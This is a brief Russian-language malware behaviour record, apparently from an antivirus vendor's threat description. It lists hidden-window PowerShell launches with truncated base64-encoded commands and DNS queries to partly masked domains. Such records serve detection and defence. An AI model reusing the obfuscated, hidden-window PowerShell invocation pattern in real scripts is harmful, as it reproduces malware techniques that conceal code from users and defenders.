Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABHAHUAeQBhAG4AYQBfAEQAbwBsAGwAYQByAG8AZgBiAD0AJwBDAGEAbQBiAHIAaQBkAGcAZQBzAGgAaQByAGUAYgBqAG4AJwA...
- DNS ASK so##tec.fr
- DNS ASK pa##k.net
- DNS ASK ha#####ndsonsinc.com
- DNS ASK ko####eayande.com
- DNS ASK po####company.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABHAHUAeQBhAG4AYQBfAEQAbwBsAGwAYQByAG8AZgBiAD0AJwBDAGEAbQBiAHIAaQBkAGcAZQBzAGgAaQByAGUAYgBqAG4AJwA...' (со скрытым окном)